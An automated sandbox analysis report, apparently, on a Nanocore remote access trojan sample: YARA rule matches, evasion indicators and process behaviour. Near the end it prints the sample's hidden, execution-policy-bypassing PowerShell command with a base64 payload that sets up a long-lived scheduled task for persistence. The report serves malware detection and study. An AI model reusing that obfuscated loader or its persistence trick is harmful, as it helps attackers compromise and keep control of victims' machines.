Source: 15.2.MSBuild.exe.53c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.53c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.5c90000.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5c90000.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.51b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.51b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.51b0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.51b0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.5400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.61d0000.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.61d0000.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.53c0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.53c0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.5cc0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5cc0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.61d0000.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.61d0000.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.5cd0000.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5cd0000.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.5370000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5370000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.53b0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.53b0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.51c0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.51c0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.5cc0000.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5cc0000.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.5ca0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5ca0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.5ca0000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5ca0000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.5400000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5400000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.0.GgNhpv.exe.2d0000.0.unpack, type: UNPACKEDPEMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 15.2.MSBuild.exe.51c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.51c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 15.2.MSBuild.exe.5cd0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5cd0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.GgNhpv.exe.2d0000.0.unpack, type: UNPACKEDPEMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)Show sources
Source: GgNhpv.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.NET source code contains calls to encryption/decryption functionsShow sources
Source: 15.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 15.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
Source: 15.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
Binary contains paths to development resourcesShow sources
Source: wpasv.exe, 00000010.00000002.989106106.0000000003270000.00000004.00000001.sdmp, wpasv.exe, 00000012.00000002.1016646289.0000000002C20000.00000004.00000001.sdmpBinary or memory string: *.slnT#Nl
Source: wpasv.exe, 00000010.00000002.989106106.0000000003270000.00000004.00000001.sdmp, wpasv.exe, 00000012.00000002.1016646289.0000000002C20000.00000004.00000001.sdmpBinary or memory string: LlUC:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\*.sln
Source: wpasv.exe, 00000010.00000002.987382069.0000000000EB2000.00000002.00020000.sdmp, wpasv.exe, 00000012.00000000.1010762421.0000000000822000.00000002.00020000.sdmp, wpasv.exe.15.drBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
Source: wpasv.exe, 00000010.00000002.987382069.0000000000EB2000.00000002.00020000.sdmp, wpasv.exe, 00000012.00000000.1010762421.0000000000822000.00000002.00020000.sdmp, wpasv.exe.15.drBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: wpasv.exe, wpasv.exe.15.drBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
Source: wpasv.exe, 00000010.00000002.987382069.0000000000EB2000.00000002.00020000.sdmp, wpasv.exe, 00000012.00000000.1010762421.0000000000822000.00000002.00020000.sdmp, wpasv.exe.15.drBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
Source: wpasv.exe, wpasv.exe.15.drBinary or memory string: *.sln
Source: wpasv.exe, 00000010.00000002.987382069.0000000000EB2000.00000002.00020000.sdmp, wpasv.exe, 00000012.00000000.1010762421.0000000000822000.00000002.00020000.sdmp, wpasv.exe.15.drBinary or memory string: MSBuild MyApp.csproj /t:Clean
Source: wpasv.exe, 00000010.00000002.987382069.0000000000EB2000.00000002.00020000.sdmp, wpasv.exe, 00000012.00000000.1010762421.0000000000822000.00000002.00020000.sdmp, wpasv.exe.15.drBinary or memory string: /ignoreprojectextensions:.sln
Source: wpasv.exe, 00000010.00000002.987382069.0000000000EB2000.00000002.00020000.sdmp, wpasv.exe, 00000012.00000000.1010762421.0000000000822000.00000002.00020000.sdmp, wpasv.exe.15.drBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.evad.winEXE@37/43@6/3
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\GgNhpv.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\GgNhpv.exe.logJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:744:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3988:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{9470f20e-e20d-41ee-b53a-fa80f071eb91}
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4888:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1044:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4188:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_01
Creates temporary filesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prtsbvfc.nov.ps1Jump to behavior
PE file has an executable .text section and no other executable sectionShow sources
Source: GgNhpv.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Users\user\Desktop\GgNhpv.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Reads software policiesShow sources
Source: C:\Users\user\Desktop\GgNhpv.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\GgNhpv.exeFile read: C:\Users\user\Desktop\GgNhpv.exe:Zone.IdentifierJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\GgNhpv.exe 'C:\Users\user\Desktop\GgNhpv.exe'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -windowstyle hidden -ExecutionPolicy Bypass PowERsHELl.`ExE -ExecutionPolicy bypass /e JAByAGUAZwAgAD0AIAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAGMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBDAGEAcAB0AGkAbwBuADsASQBmACAAKAAkAHIAZQBnACAALQBNAGEAdABjAGgAIAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAAVwBpAG4AZABvAHcAcwAgADEAMAAnACkAIAB7ACQAZAB0AD0AIAAoAFsARABhAHQAZQBUAGkAbQBlAF0AOgA6AE4AbwB3ACkAOwAkAGQAdQByAGEAdABpAG8AbgAgAD0AIAAkAGQAdAAuAEEAZABkAFkAZQBhAHIAcwAoADIANQApACAALQAkAGQAdAA7ACQAYQBjAHQAaQBvAG4AIAAgACAAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBjAG0AZAAuAGUAeABlACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALwBjACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0ARQBwACAAQgB5AFAAYQBzAHMAIAAtAHcAaQBuACAAMQAgAC8AbgBvAFAAIAAtAG4AbwBsAE8AZwBPACAALQBuAG8ATgBpAG4AdABlAFIAYQBjAFQAaQAgACQAYwBoAGUAYwBrAD0ARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAbwB1AHQAcAB1AHQAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBpAGYAIAAoACQAYwBoAGUAYwBrACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsAIAAgAFAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AZQBQACAAQgBZAFAAYQBzAFMAIAAvAG4ATwBwACAALQBuAG8AbABPAGcATwAgAC0AdwBpAG4AIAAxACAALQBuAG8ATgBpAG4AdABlAFIAYQBjAFQAaQAgAC8AZQAgAEoAQQBCAHkAQQBHAFUAQQBaAHcAQQBnAEEARAAwAEEASQBBAEEAbwBBAEMAYwBBAGUAdwBBAHkAQQBIADAAQQBlAHcAQQB3AEEASAAwAEEAZQB3AEEAeABBAEgAMABBAGUAdwBBAHoAQQBIADAAQQBKAHcAQQB0AEEARwBZAEEASgB3AEIAawBBAEYATQBBAGQAQQBBAG4AQQBDAHcAQQBKAHcAQgB5AEEARwBrAEEAYgBnAEEAbgBBAEMAdwBBAEgAQwBCAGcAQQBFAFEAQQBZAEEAQgB2AEEARwBBAEEAZAB3AEIAdQBBAEcAQQBBAGIAQQBCAGcAQQBHADgAQQBZAFEAQQBkAEkAQwB3AEEASgB3AEIAbgBBAEMAYwBBAEsAUQBBADcAQQBGAHMAQQBkAGcAQgB2AEEARwBrAEEAWgBBAEIAZABBAEMAQQBBAFcAdwBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYASQBBAFoAUQBCAG0AQQBHAHcAQQBaAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEwAZwBCAEIAQQBIAE0AQQBjAHcAQgBsAEEARwAwAEEAWQBn